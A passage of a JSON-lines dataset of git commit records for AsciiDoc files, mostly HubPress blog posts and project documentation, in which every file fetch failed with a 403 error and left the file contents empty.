403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0e58ec161e340cd0edc5c854714311d0a77646d6","subject":"Update 2015-02-24-Second-Post.adoc","message":"Update 2015-02-24-Second-Post.adoc","repos":"RaoUmer\/hubpress.io,RaoUmer\/hubpress.io,RaoUmer\/hubpress.io","old_file":"_posts\/2015-02-24-Second-Post.adoc","new_file":"_posts\/2015-02-24-Second-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RaoUmer\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c2fd839a1359e1e1253dd9398be5f14783f15ddc","subject":"Update 2015-02-28-A-Code-post.adoc","message":"Update 2015-02-28-A-Code-post.adoc","repos":"pdudits\/hubpress,pdudits\/pdudits.github.io,pdudits\/pdudits.github.io,pdudits\/hubpress,pdudits\/pdudits.github.io,pdudits\/pdudits.github.io,pdudits\/hubpress,pdudits\/hubpress","old_file":"_posts\/2015-02-28-A-Code-post.adoc","new_file":"_posts\/2015-02-28-A-Code-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pdudits\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"db2a049fffb7961da4e9e0b93f5aef07d4102a34","subject":"Update 2016-10-11-Hello-World.adoc","message":"Update 2016-10-11-Hello-World.adoc","repos":"pallewela\/pallewela.github.io,pallewela\/pallewela.github.io,pallewela\/pallewela.github.io,pallewela\/pallewela.github.io","old_file":"_posts\/2016-10-11-Hello-World.adoc","new_file":"_posts\/2016-10-11-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pallewela\/pallewela.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cdfd8bb650a466211a37e2cfcfceabf236ef883a","subject":"Update 2018-11-08-A-W-S-Azure.adoc","message":"Update 2018-11-08-A-W-S-Azure.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-08-A-W-S-Azure.adoc","new_file":"_posts\/2018-11-08-A-W-S-Azure.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"094618a410148b7d6794ec752f26e5a423dc8eaf","subject":"Update 2016-07-24-Virtual-Box-via-linha-de-comando-o-basico.adoc","message":"Update 2016-07-24-Virtual-Box-via-linha-de-comando-o-basico.adoc","repos":"cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io","old_file":"_posts\/2016-07-24-Virtual-Box-via-linha-de-comando-o-basico.adoc","new_file":"_posts\/2016-07-24-Virtual-Box-via-linha-de-comando-o-basico.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cegohub\/cegohub.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ee76f27ea611d59fddd9d8c6813a1e6ec8a1b372","subject":"y2b create post The World's First Portable Theater!","message":"y2b create post The World's First Portable Theater!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-08-28-The-Worlds-First-Portable-Theater.adoc","new_file":"_posts\/2016-08-28-The-Worlds-First-Portable-Theater.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d2033959e5d24539da42bab557d94830343130df","subject":"Update 2019-01-10-Research-An-Artisanal-Perspective.adoc","message":"Update 2019-01-10-Research-An-Artisanal-Perspective.adoc","repos":"gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io","old_file":"_posts\/2019-01-10-Research-An-Artisanal-Perspective.adoc","new_file":"_posts\/2019-01-10-Research-An-Artisanal-Perspective.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gudhakesa\/gudhakesa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2880b4f8c52cc853710e8a3f52c1aa8baf2d8eae","subject":"Update 2015-11-22-Devlet-Sirri.adoc","message":"Update 2015-11-22-Devlet-Sirri.adoc","repos":"mhmtbsbyndr\/mhmtbsbyndr.github.io,mhmtbsbyndr\/mhmtbsbyndr.github.io,mhmtbsbyndr\/mhmtbsbyndr.github.io","old_file":"_posts\/2015-11-22-Devlet-Sirri.adoc","new_file":"_posts\/2015-11-22-Devlet-Sirri.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mhmtbsbyndr\/mhmtbsbyndr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6fae8bb59f3b7ad537f93a65b6d45bbd37791388","subject":"y2b create post iPhone Jenga","message":"y2b create post iPhone Jenga","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-01-26-iPhone-Jenga.adoc","new_file":"_posts\/2017-01-26-iPhone-Jenga.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f8c5fe91ec9819140d24ea1fd100e091e93937b","subject":"Update 2015-04-23-iOS-interview-part-2.adoc","message":"Update 2015-04-23-iOS-interview-part-2.adoc","repos":"J0HDev\/blog,J0HDev\/blog,J0HDev\/blog","old_file":"_posts\/2015-04-23-iOS-interview-part-2.adoc","new_file":"_posts\/2015-04-23-iOS-interview-part-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/J0HDev\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"020553fea05d2f75423cd4df101e82952c324d72","subject":"Update 2015-05-03-Auszeichnugssprachen.adoc","message":"Update 2015-05-03-Auszeichnugssprachen.adoc","repos":"fundstuecke\/fundstuecke.github.io,fundstuecke\/fundstuecke.github.io,fundstuecke\/fundstuecke.github.io","old_file":"_posts\/2015-05-03-Auszeichnugssprachen.adoc","new_file":"_posts\/2015-05-03-Auszeichnugssprachen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fundstuecke\/fundstuecke.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f87599c70d1c76c47887660faedd3c32053cef5f","subject":"Update 2015-05-16-Faustino-loeza-Perez.adoc","message":"Update 2015-05-16-Faustino-loeza-Perez.adoc","repos":"faustinoloeza\/blog,faustinoloeza\/blog,faustinoloeza\/blog","old_file":"_posts\/2015-05-16-Faustino-loeza-Perez.adoc","new_file":"_posts\/2015-05-16-Faustino-loeza-Perez.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faustinoloeza\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6178726ad8e46f0ca414378e72c15803f6eb910a","subject":"Update 2017-02-26-Trying-out-Hub-Press.adoc","message":"Update 2017-02-26-Trying-out-Hub-Press.adoc","repos":"amodig\/amodig.github.io,amodig\/amodig.github.io,amodig\/amodig.github.io,amodig\/amodig.github.io","old_file":"_posts\/2017-02-26-Trying-out-Hub-Press.adoc","new_file":"_posts\/2017-02-26-Trying-out-Hub-Press.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/amodig\/amodig.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"42c0d92b8e6b2d66dcb6924b328a2a663ca5abb0","subject":"Update 2017-05-29-Anaya-Blog-Episode-1.adoc","message":"Update 2017-05-29-Anaya-Blog-Episode-1.adoc","repos":"harvard-visionlab\/harvard-visionlab.github.io,harvard-visionlab\/harvard-visionlab.github.io,harvard-visionlab\/harvard-visionlab.github.io,harvard-visionlab\/harvard-visionlab.github.io","old_file":"_posts\/2017-05-29-Anaya-Blog-Episode-1.adoc","new_file":"_posts\/2017-05-29-Anaya-Blog-Episode-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/harvard-visionlab\/harvard-visionlab.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3e37751460391958bb2206919eaef53f4e8fc28e","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b8976c931afb02dc9e50070bf5cc8f41adb2b506","subject":"WICKET-6395 minor fixes to single.adoc","message":"WICKET-6395 minor fixes to single.adoc","repos":"aldaris\/wicket,dashorst\/wicket,dashorst\/wicket,mosoft521\/wicket,mosoft521\/wicket,apache\/wicket,selckin\/wicket,apache\/wicket,aldaris\/wicket,bitstorm\/wicket,aldaris\/wicket,apache\/wicket,aldaris\/wicket,selckin\/wicket,bitstorm\/wicket,apache\/wicket,mosoft521\/wicket,selckin\/wicket,dashorst\/wicket,dashorst\/wicket,selckin\/wicket,dashorst\/wicket,bitstorm\/wicket,mosoft521\/wicket,bitstorm\/wicket,mosoft521\/wicket,bitstorm\/wicket,aldaris\/wicket,apache\/wicket,selckin\/wicket","old_file":"wicket-user-guide\/src\/main\/asciidoc\/single.adoc","new_file":"wicket-user-guide\/src\/main\/asciidoc\/single.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apache\/wicket.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d3a8a8d7946651cd5e7405f87ef00748470b24d6","subject":"Update 2017-05-13-DNS-Whitelist-in-BIND-with-RPZ.adoc","message":"Update 2017-05-13-DNS-Whitelist-in-BIND-with-RPZ.adoc","repos":"topranks\/topranks.github.io,topranks\/topranks.github.io,topranks\/topranks.github.io,topranks\/topranks.github.io","old_file":"_posts\/2017-05-13-DNS-Whitelist-in-BIND-with-RPZ.adoc","new_file":"_posts\/2017-05-13-DNS-Whitelist-in-BIND-with-RPZ.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topranks\/topranks.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8e079995c653859a508afb2b81f80ad6230a91e5","subject":"Update 2017-12-11-Large-Files-with-the-Fetch-API.adoc","message":"Update 2017-12-11-Large-Files-with-the-Fetch-API.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-12-11-Large-Files-with-the-Fetch-API.adoc","new_file":"_posts\/2017-12-11-Large-Files-with-the-Fetch-API.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0269047b15a6173694aea7b23cdda8c321a63798","subject":"y2b create post Unboxing The $3000 Bluetooth Speaker","message":"y2b create post Unboxing The $3000 Bluetooth Speaker","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-04-12-Unboxing-The-3000-Bluetooth-Speaker.adoc","new_file":"_posts\/2017-04-12-Unboxing-The-3000-Bluetooth-Speaker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ad0015e839e184e7a51c90fb065309d7990f77f5","subject":"Create news landing page","message":"Create news landing page\n","repos":"clojure\/clojure-site","old_file":"content\/news\/news.adoc","new_file":"content\/news\/news.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"6fe66d21d4c9002811cfa4e25cec49c8e753a826","subject":"Create SECURITY.adoc","message":"Create SECURITY.adoc","repos":"docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain","old_file":"SECURITY.adoc","new_file":"SECURITY.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/docToolchain\/docToolchain.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f6b6e85ad127a0ff9d9da7d183a0cd88f4630c1","subject":"Publish 2015-09-2-Daisies-arent-roses.adoc","message":"Publish 2015-09-2-Daisies-arent-roses.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"2015-09-2-Daisies-arent-roses.adoc","new_file":"2015-09-2-Daisies-arent-roses.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9801a968f9fbdd9a2e78074c946c2d8265b672c2","subject":"y2b create post Gold Play Button Unboxing!","message":"y2b create post Gold Play Button Unboxing!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-11-17-Gold-Play-Button-Unboxing.adoc","new_file":"_posts\/2014-11-17-Gold-Play-Button-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c5174203ba53051e962f8d6358508cbd36fd81c1","subject":"Update 2017-09-05-Error-Installing-Glide-Go.adoc","message":"Update 2017-09-05-Error-Installing-Glide-Go.adoc","repos":"alimasyhur\/alimasyhur.github.io,alimasyhur\/alimasyhur.github.io,alimasyhur\/alimasyhur.github.io,alimasyhur\/alimasyhur.github.io","old_file":"_posts\/2017-09-05-Error-Installing-Glide-Go.adoc","new_file":"_posts\/2017-09-05-Error-Installing-Glide-Go.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alimasyhur\/alimasyhur.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0207cc62137409bf5d0dcbd14862da78cf4745cd","subject":"y2b create post THE WEIRDEST SPEAKERS YET","message":"y2b create post THE WEIRDEST SPEAKERS YET","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-06-26-THE-WEIRDEST-SPEAKERS-YET.adoc","new_file":"_posts\/2016-06-26-THE-WEIRDEST-SPEAKERS-YET.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf1acc6bee8352898a5a164790a26dd2dcc25071","subject":"docs: update build-from-source instructions for blessed build layout","message":"docs: update build-from-source instructions for blessed build layout\n\nI'm not convinced that this makes sense; in my opinion, installation.adoc\nisn't intended for Kudu developers, but for people running on platforms for\nwhich we lack prebuilt binaries. JD pointed out that the Java client build\nmuddies this somewhat, as it's reasonable to expect these people to want to\nbuild the Java client, and by default maven will run unit tests, which will\nfail unless they're using the blessed build layout (or pass -DbinDir).\n\nAnyway, the blessed build layout doesn't actually hurt casual\nbuild-from-source people; it's just more complexity.\n\nI also removed the various mentions of openssl-devel as with the dlopen()\nchange to squeasel it's no longer necessary for building.\n\nChange-Id: Ic482c084397d13a0fd9e0b3e710449bc5cd866c4\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/1997\nTested-by: Kudu Jenkins\nReviewed-by: Jean-Daniel Cryans\n","repos":"EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu","old_file":"docs\/installation.adoc","new_file":"docs\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1d0500398690f728c05075eb60d0311b24b012ed","subject":"Update 2015-11-27-Hello-World.adoc","message":"Update 2015-11-27-Hello-World.adoc\n","repos":"doochik\/doochik.github.io,doochik\/doochik.github.io,doochik\/doochik.github.io,doochik\/doochik.github.io","old_file":"_posts\/2015-11-27-Hello-World.adoc","new_file":"_posts\/2015-11-27-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/doochik\/doochik.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f1e94a6ad451d6c3232df0fdbeeea242432f6ec4","subject":"Update spark.adoc (#821)","message":"Update spark.adoc (#821)\n\nFix typo","repos":"elastic\/elasticsearch-hadoop,takezoe\/elasticsearch-hadoop,xjrk58\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/core\/spark.adoc","new_file":"docs\/src\/reference\/asciidoc\/core\/spark.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xjrk58\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8627ebdba22b7cfdee6b9a25ea6e1eecadb11a5b","subject":"Update 2015-11-03-Learning-About-Hadoop.adoc","message":"Update 2015-11-03-Learning-About-Hadoop.adoc","repos":"sumit1sen\/sumit1sen.github.io,sumit1sen\/sumit1sen.github.io,sumit1sen\/sumit1sen.github.io","old_file":"_posts\/2015-11-03-Learning-About-Hadoop.adoc","new_file":"_posts\/2015-11-03-Learning-About-Hadoop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sumit1sen\/sumit1sen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f49f8b8c11b83759fe0fcae312d754672366e5be","subject":"Update 2017-04-10-3-D-printer-is-coming.adoc","message":"Update 2017-04-10-3-D-printer-is-coming.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-10-3-D-printer-is-coming.adoc","new_file":"_posts\/2017-04-10-3-D-printer-is-coming.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65a05038aa8bfbb966be017162cd8b2229d7a6c5","subject":"Update 2017-06-22-A-Disjuncao-no-Prolog.adoc","message":"Update 2017-06-22-A-Disjuncao-no-Prolog.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-06-22-A-Disjuncao-no-Prolog.adoc","new_file":"_posts\/2017-06-22-A-Disjuncao-no-Prolog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b9735a77afdcac1d1043fd2d38d35da7b3b3a42","subject":"Publish 2015-5-10-uGui.adoc","message":"Publish 2015-5-10-uGui.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"2015-5-10-uGui.adoc","new_file":"2015-5-10-uGui.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9c11a36e2d876307dda6e993a2e04fc0403505b","subject":"Update 2016-02-03-Attention-or-Retention-or-Protention.adoc","message":"Update 2016-02-03-Attention-or-Retention-or-Protention.adoc","repos":"jfavlam\/Concepts,jfavlam\/Concepts,jfavlam\/Concepts","old_file":"_posts\/2016-02-03-Attention-or-Retention-or-Protention.adoc","new_file":"_posts\/2016-02-03-Attention-or-Retention-or-Protention.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jfavlam\/Concepts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f757ba329f6619dd97d7e870d5074801d6518e90","subject":"doc: update ASTF UDP","message":"doc: update ASTF UDP\n\nSigned-off-by: Hanoh Haim <1f34741bfa88280155d5053f5e8f4b89d8aa79bf@cisco.com>\n","repos":"dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core","old_file":"doc\/trex_astf.asciidoc","new_file":"doc\/trex_astf.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dimagol\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"656d73b144d8a33514fa8f465ff1f22261aa741a","subject":"Added IoCs for RTM","message":"Added IoCs for RTM\n","repos":"eset\/malware-ioc,eset\/malware-ioc","old_file":"rtm\/README.adoc","new_file":"rtm\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eset\/malware-ioc.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"8e325d13043b1d2ce68a20c8343005cad8f8f3b1","subject":"Update knowledgebase proto link","message":"Update knowledgebase proto link","repos":"destijl\/artifacts,destijl\/artifacts,pidydx\/artifacts,pidydx\/artifacts","old_file":"docs\/Artifacts definition format and style guide.asciidoc","new_file":"docs\/Artifacts definition format and style guide.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pidydx\/artifacts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dc897fd2fa6240997451cee435c83657c5bc6915","subject":"Suppression adoc correspondant","message":"Suppression adoc correspondant","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2015-02-13-Mockito-le-mock-facile.adoc","new_file":"_posts\/2015-02-13-Mockito-le-mock-facile.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c44f5f100ad63ff33d52874585437eebd6df7a33","subject":"Add textannotations.asciidoc","message":"Add textannotations.asciidoc\n","repos":"blindsightcorp\/rigor,blindsightcorp\/rigor","old_file":"textannotations.asciidoc","new_file":"textannotations.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blindsightcorp\/rigor.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"5d6fd9aad5737d3a4a007071126e9bcd3e80f430","subject":"Update 2015-05-06-explain-about-exam-app.adoc","message":"Update 2015-05-06-explain-about-exam-app.adoc","repos":"J0HDev\/blog,J0HDev\/blog,J0HDev\/blog","old_file":"_posts\/2015-05-06-explain-about-exam-app.adoc","new_file":"_posts\/2015-05-06-explain-about-exam-app.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/J0HDev\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76d5077927b4a09c4bfa48bcf555802089dcccec","subject":"Update 2016-04-03-etat-limite-borderline.adoc","message":"Update 2016-04-03-etat-limite-borderline.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-04-03-etat-limite-borderline.adoc","new_file":"_posts\/2016-04-03-etat-limite-borderline.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"13ad970aa4b76e0eddc4bddf870aae91d33cbf26","subject":"Create file","message":"Create file","repos":"XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4","old_file":"xill-web-service\/tmp-test\/delete-worker\/httpie-request.adoc","new_file":"xill-web-service\/tmp-test\/delete-worker\/httpie-request.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/XillioQA\/xill-platform-3.4.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f30c13ceb6739d479dadfbcc97a4abf72a8ce15e","subject":"minor","message":"minor\n","repos":"kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core","old_file":"trex_index.asciidoc","new_file":"trex_index.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3d5312cb81eb25cd6bcb6154440d0c6502d933be","subject":"Update 2017-04-23-Preterito-Imperfecto.adoc","message":"Update 2017-04-23-Preterito-Imperfecto.adoc","repos":"preteritoimperfecto\/preteritoimperfecto.github.io,preteritoimperfecto\/preteritoimperfecto.github.io,preteritoimperfecto\/preteritoimperfecto.github.io,preteritoimperfecto\/preteritoimperfecto.github.io","old_file":"_posts\/2017-04-23-Preterito-Imperfecto.adoc","new_file":"_posts\/2017-04-23-Preterito-Imperfecto.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/preteritoimperfecto\/preteritoimperfecto.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5b5f5926c36d544cbefe77d97f974a407c06d399","subject":"fix: \u5909\u306a\u7a7a\u767d\u304c\u5165\u3063\u3066\u3044\u305f\u306e\u3092\u4fee\u6b63","message":"fix: \u5909\u306a\u7a7a\u767d\u304c\u5165\u3063\u3066\u3044\u305f\u306e\u3092\u4fee\u6b63\n","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-21-flutter-introduction.adoc","new_file":"_posts\/2018-05-21-flutter-introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"48b2702bacebfe6817723841228be7704ce0d03f","subject":"fix: \u6539\u884c\u4fee\u6b63","message":"fix: 